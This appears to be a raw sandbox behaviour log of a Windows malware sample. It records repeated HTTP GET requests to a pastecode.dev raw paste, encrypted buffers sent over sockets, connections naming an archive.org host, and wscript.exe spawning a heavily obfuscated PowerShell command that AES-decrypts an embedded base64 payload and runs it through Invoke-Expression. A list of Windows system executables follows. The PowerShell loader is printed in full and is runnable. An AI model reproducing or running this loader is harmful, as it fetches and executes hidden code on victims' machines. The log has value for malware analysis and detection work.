url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

send

buffer: ÀnS3™Å€öì¥ðr£sÎ^i7™/œö)³Ï ÙaÖ6—Ju‹ @¥G¸Þª‚£ÉêI„{ÎzV­ªûÃ"k¶+v¥p¿jÝ9ŒÕ҂¸ 7N랙¿ÙŠËž7æx¹‹:Gó Ú ¨@Âå`¸2­Á8ÿ{`3êÉa^Nðn®(]vªeËÏÝî®Îyà$ªåM‹Ðf`Z6½ÍµWt:4¹HøŒb²<¡À‘”DµÑ»óë{<u´‘íVSïö“≪UòV¼|Ë£‘^á­Ã[†\ZÏþ_ºüJ—ÿAšÓN/P'ªM|ûäÈpû‚ÀèH(D[;·Œf³—½|*Æô:€ñÌÌ$:0;®)ÍÁ¸uìÇöÇhpœ©óyü¶é˜ç•'ž Œ©ý´ï7³)Ô¥Õ²‹ Û-IíB¬ÒøäÓâ%Y…+ýæ×ªÜ õozkôªU•Mô,*úEÀúگŠŸ®Î€ÂG‰gµU/ÖwW=òôy=ÀJú^p8ˆt3 ÙZp«¹}ޙÊv՚×êq'½û€O(§êVÑdï÷ž·S•òѵË>8³»p¾
socket: 968
sent: 453
1 453 0

send

buffer: !
socket: 848
sent: 1
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

send

buffer: À÷N¼buօœp¹& 7ÈnÅ/Š¡ ë^­êõ¬Cp%Še™ð5¿à+ŸË)„nŸÙ_ãg°³“üɍktÚÑрª‡s‘™–Èl»-¡Ñ7Ø““‰°Í–Ðõò¶¡`OÃZìtòN¢r•ò—Â7v¶e›)p8=z§i±l4m‡ ¾j)ÖI¼ñßîÜýލ®°,’Îk‹G ^ µŸQÀtHþÈteƒ×9v_Y¬AÝP» ׊ô_ºRÌí‘<¿M £LS #t•û1gÐR½››ñaÓR?öèê|RÞõ²ùé֜…ņf¨][Óܚ‹½Ó>4ò?¾G^êS’iځ\“ʪ:Š'À6Öz'úa°ºõÛ©ÿï¢ÖùήBãÝ-‡NI÷§i=Õ&òü,B`ҝüØA ª Îw—Iw³£Šr-?)Ãë”û–8Èduyèi…•gs²Œ… >הÚæ×LÃxƒOW ówàìéÓy?¿He:¯‡ûk}|U–J•Ðþàì”°™–\¯ŽDx/ (bÇlÏü»Ñoÿ0íÖdŸT
socket: 968
sent: 453
1 453 0

send

buffer: !
socket: 848
sent: 1
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0010
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369364 0

send

buffer: ÀLG°ÜHÿ YÐ/ùŸ§MÍÁ¡Ú‡ÿÉdj¡.cN{¯ƒÌàUíúh2ðÐâ«5TF°"eKJƒfÜÙ I±;›™äåÙ–Vp£§1,4û¦ß n´× *ÁI ýJL˜ •É+!ÇèUûÕÃ< 0oŠ>Lngd°nJ3Ïd4œRDg(Þ`zþg†g+–YT{"Úõbª`C}­S ¤”nŸdú;þ¥lR8˜¤i›l»I¸4Ë»ù‘mîWêI…䘐á EsÅÝ®’jkÔý2ŽârG̉s—ü«OË_m¢ND¹Ç¦j)°t1C: À—&>•ÙÜ.>ˆºÅ0§š¾ê?(da¯Ÿ›~±&T‚,ʪjxåïÿ¨˜%Ï MKAw:^%_‘AyGg, ØR:BGÓa‚T57Ráꞌ°Â¦ Yö¾ê«ԓ¦*SÃ)SË¡’¢Ém3ÉeŸwœßñN‚’ìÿf§Ép$&{þ‘}ö+‰Ñ¥þ­‹3A&t;£«‡'w‘N!‰€D®÷ÄWkÉæ(Bá¨fE&ºã{I6T·œ¹©çMü¶Â
socket: 968
sent: 453
1 453 0

send

buffer: !
socket: 848
sent: 1
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

send

buffer: ÀZ Ý~ã͘d†&,$CJ÷õälj’¡´Ð D;¾:_Å܉¢™¶Rrè~ Û.'á·9”JÔ0»Šáp²[¯ÌmÒ·³rM Wo}93ž]€3„¦åü*¯µÙ_)ÅòUÊ3–0֬ɹdDóä%ÂØ?`+zÿ 7–᨜km ˜ï—ºè¥%œŽ]EO+fL¬´?Õ~i»×\7Z ˆ2fG(ž{ã+?.ɐžºO¼ä Â99Î÷¹€kµÇ¬R­¡a•ß–ùŽµÜ§jcÝ[d-úvÙ=]ÝÞ ”•= ìšn?{’Þ¿6’†ñÿKÍ"1]@ ÚÂÍ߯Ÿã¹<wïBhJÉuLçT§ºÈÀ#ÍW™x"AËØÚqÊ°¥ó@¨l2£?}"Øž¦¿‰½íÛúÚAªžˆÌw¿íÕ[”÷Ò]òA0iÖR¶ÁAIã›RZ­jšâ‡Ìªp"?ÆV¬#øWü3ª§ŠÂsxb#,¦ùºž ,³8•è‹À UB4[;m)Éý`Q0£Æñ=ÉcÞÂ΍ìüˆ©El@ÒâcW·6Ùôh´
socket: 968
sent: 453
1 453 0

send

buffer: !
socket: 848
sent: 1
1 1 0

send

buffer: zvfÔ i1õw*¯ l´ÀÒb ŠCµf!žüÞ/5 ÀÀÀ À 285ÿia803405.us.archive.org  
socket: 1312
sent: 127
1 127 0

send

buffer: zvfÔ ~8¼ `F´X» ²)h¡ž®ÁtŽÜñ¤Æk/5 ÀÀÀ À 285ÿia803405.us.archive.org  
socket: 1312
sent: 127
1 127 0

send

buffer: zvfÔ {")rP\ZÖ#æÄYÓm¢¢*Á`|qû/5 ÀÀÀ À 285ÿia803405.us.archive.org  
socket: 1312
sent: 127
1 127 0

send

buffer: zvfÔ!T;—êjÐÌ ¿Vìøþ,çâ¨ÉŒ ÉX/5 ÀÀÀ À 285ÿia803405.us.archive.org  
socket: 1312
sent: 127
1 127 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
parent_process wscript.exe martian_process powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe